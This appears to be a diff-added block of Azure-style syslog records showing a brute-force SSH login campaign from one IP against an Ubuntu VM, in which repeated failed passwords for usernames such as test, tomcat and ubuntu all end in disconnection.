+3214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:57,UbuntuDevEnv,2019-06-28 05:28:57,auth,UbuntuDevEnv,info,Invalid user telecomadmin from 193.201.224.232 port 15100,96287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telecomadmin,193.201.224.2,15100,,
+3215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:57,UbuntuDevEnv,2019-06-28 05:28:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:57,UbuntuDevEnv,2019-06-28 05:28:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:59,UbuntuDevEnv,2019-06-28 05:28:58,auth,UbuntuDevEnv,info,Failed password for invalid user telecomadmin from 193.201.224.232 port 15100 ssh2,96287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telecomadmin,193.201.224.2,15100,,
+3218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:15,UbuntuDevEnv,2019-06-28 05:29:14,auth,UbuntuDevEnv,info,"Disconnecting invalid user telecomadmin 193.201.224.232 port 15100: Change of username or service not allowed: (telecomadmin,ssh-connection) -> (test,ssh-connection) [preauth]",96287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telecomadmin,193.201.224.2,15100,,
+3219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:21,UbuntuDevEnv,2019-06-28 05:29:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=test,96372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,193.201.224.2,,0,
+3220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:23,UbuntuDevEnv,2019-06-28 05:29:22,auth,UbuntuDevEnv,info,Failed password for test from 193.201.224.232 port 22699 ssh2,96372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,22699,,
+3221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:30,UbuntuDevEnv,2019-06-28 05:29:28,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for test from 193.201.224.232 port 22699 ssh2],96372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,22699,,
+3222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:31,UbuntuDevEnv,2019-06-28 05:29:30,auth,UbuntuDevEnv,info,Failed password for test from 193.201.224.232 port 22699 ssh2,96372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,22699,,
+3223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:35,UbuntuDevEnv,2019-06-28 05:29:35,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for test from 193.201.224.232 port 22699 ssh2 [preauth],96372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,22699,,
+3224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:35,UbuntuDevEnv,2019-06-28 05:29:35,auth,UbuntuDevEnv,info,Failed password for test from 193.201.224.232 port 22699 ssh2,96372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,22699,,
+3225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:35,UbuntuDevEnv,2019-06-28 05:29:35,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=test,96372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,193.201.224.2,,0,
+3226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:35,UbuntuDevEnv,2019-06-28 05:29:35,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,96372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+3227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:35,UbuntuDevEnv,2019-06-28 05:29:35,auth,UbuntuDevEnv,info,Disconnecting authenticating user test 193.201.224.232 port 22699: Too many authentication failures [preauth],96372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,193.201.224.2,22699,,
+3228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:38,UbuntuDevEnv,2019-06-28 05:29:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=test,96455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,193.201.224.2,,0,
+3229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:40,UbuntuDevEnv,2019-06-28 05:29:40,auth,UbuntuDevEnv,info,Failed password for test from 193.201.224.232 port 4338 ssh2,96455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,4338,,
+3230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:55,UbuntuDevEnv,2019-06-28 05:29:54,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for test from 193.201.224.232 port 4338 ssh2],96455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,4338,,
+3231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:55,UbuntuDevEnv,2019-06-28 05:29:54,auth,UbuntuDevEnv,info,Disconnecting authenticating user test 193.201.224.232 port 4338: Too many authentication failures [preauth],96455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,193.201.224.2,4338,,
+3232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:55,UbuntuDevEnv,2019-06-28 05:29:54,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=test,96455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,193.201.224.2,,0,
+3233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:55,UbuntuDevEnv,2019-06-28 05:29:54,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,96455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+3234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:55,UbuntuDevEnv,2019-06-28 05:29:54,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for test from 193.201.224.232 port 4338 ssh2 [preauth],96455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,4338,,
+3235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:56,UbuntuDevEnv,2019-06-28 05:29:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=test,96513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,193.201.224.2,,0,
+3236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:29:58,UbuntuDevEnv,2019-06-28 05:29:57,auth,UbuntuDevEnv,info,Failed password for test from 193.201.224.232 port 48186 ssh2,96513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,48186,,
+3237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:02,UbuntuDevEnv,2019-06-28 05:30:01,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for test from 193.201.224.232 port 48186 ssh2],96513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,48186,,
+3238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:02,UbuntuDevEnv,2019-06-28 05:30:02,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=test,96513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,193.201.224.2,,0,
+3239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:02,UbuntuDevEnv,2019-06-28 05:30:02,auth,UbuntuDevEnv,info,"Disconnecting authenticating user test 193.201.224.232 port 48186: Change of username or service not allowed: (test,ssh-connection) -> (testuser,ssh-connection) [preauth]",96513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,193.201.224.2,48186,,
+3240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:03,UbuntuDevEnv,2019-06-28 05:30:03,auth,UbuntuDevEnv,info,Invalid user testuser from 193.201.224.232 port 15898,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,193.201.224.2,15898,,
+3241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:03,UbuntuDevEnv,2019-06-28 05:30:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:03,UbuntuDevEnv,2019-06-28 05:30:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:06,UbuntuDevEnv,2019-06-28 05:30:05,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 193.201.224.232 port 15898 ssh2,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,193.201.224.2,15898,,
+3244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:06,UbuntuDevEnv,2019-06-28 05:30:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:08,UbuntuDevEnv,2019-06-28 05:30:07,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 193.201.224.232 port 15898 ssh2,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,193.201.224.2,15898,,
+3246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:08,UbuntuDevEnv,2019-06-28 05:30:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:10,UbuntuDevEnv,2019-06-28 05:30:10,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 193.201.224.232 port 15898 ssh2,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,193.201.224.2,15898,,
+3248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:11,UbuntuDevEnv,2019-06-28 05:30:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:13,UbuntuDevEnv,2019-06-28 05:30:12,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 193.201.224.232 port 15898 ssh2,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,193.201.224.2,15898,,
+3250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:13,UbuntuDevEnv,2019-06-28 05:30:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:15,UbuntuDevEnv,2019-06-28 05:30:15,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 193.201.224.232 port 15898 ssh2,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,193.201.224.2,15898,,
+3252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:17,UbuntuDevEnv,2019-06-28 05:30:17,auth,UbuntuDevEnv,info,"Disconnecting invalid user testuser 193.201.224.232 port 15898: Change of username or service not allowed: (testuser,ssh-connection) -> (tomcat,ssh-connection) [preauth]",96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,193.201.224.2,15898,,
+3253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:17,UbuntuDevEnv,2019-06-28 05:30:17,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+3254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:17,UbuntuDevEnv,2019-06-28 05:30:17,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:22,UbuntuDevEnv,2019-06-28 05:30:22,auth,UbuntuDevEnv,info,Invalid user tomcat from 193.201.224.232 port 56204,96627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,193.201.224.2,56204,,
+3256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:22,UbuntuDevEnv,2019-06-28 05:30:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:22,UbuntuDevEnv,2019-06-28 05:30:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:24,UbuntuDevEnv,2019-06-28 05:30:23,auth,UbuntuDevEnv,info,Failed password for invalid user tomcat from 193.201.224.232 port 56204 ssh2,96627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,193.201.224.2,56204,,
+3259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:24,UbuntuDevEnv,2019-06-28 05:30:24,auth,UbuntuDevEnv,info,"Disconnecting invalid user tomcat 193.201.224.232 port 56204: Change of username or service not allowed: (tomcat,ssh-connection) -> (ts3,ssh-connection) [preauth]",96627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,193.201.224.2,56204,,
+3260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:25,UbuntuDevEnv,2019-06-28 05:30:25,auth,UbuntuDevEnv,info,Invalid user ts3 from 193.201.224.232 port 63640,96660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,193.201.224.2,63640,,
+3261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:25,UbuntuDevEnv,2019-06-28 05:30:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:25,UbuntuDevEnv,2019-06-28 05:30:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:28,UbuntuDevEnv,2019-06-28 05:30:27,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 193.201.224.232 port 63640 ssh2,96660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,193.201.224.2,63640,,
+3264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:28,UbuntuDevEnv,2019-06-28 05:30:28,auth,UbuntuDevEnv,info,"Disconnecting invalid user ts3 193.201.224.232 port 63640: Change of username or service not allowed: (ts3,ssh-connection) -> (ubadmin,ssh-connection) [preauth]",96660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,193.201.224.2,63640,,
+3265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:30,UbuntuDevEnv,2019-06-28 05:30:30,auth,UbuntuDevEnv,info,Invalid user ubadmin from 193.201.224.232 port 3800,96674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubadmin,193.201.224.2,3800,,
+3266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:30,UbuntuDevEnv,2019-06-28 05:30:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:30,UbuntuDevEnv,2019-06-28 05:30:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:33,UbuntuDevEnv,2019-06-28 05:30:32,auth,UbuntuDevEnv,info,Failed password for invalid user ubadmin from 193.201.224.232 port 3800 ssh2,96674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubadmin,193.201.224.2,3800,,
+3269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:33,UbuntuDevEnv,2019-06-28 05:30:32,auth,UbuntuDevEnv,info,"Disconnecting invalid user ubadmin 193.201.224.232 port 3800: Change of username or service not allowed: (ubadmin,ssh-connection) -> (ubuntu,ssh-connection) [preauth]",96674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubadmin,193.201.224.2,3800,,
+3270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:38,UbuntuDevEnv,2019-06-28 05:30:37,auth,UbuntuDevEnv,info,Invalid user ubuntu from 193.201.224.232 port 32012,96694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,193.201.224.2,32012,,
+3271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:38,UbuntuDevEnv,2019-06-28 05:30:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:38,UbuntuDevEnv,2019-06-28 05:30:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
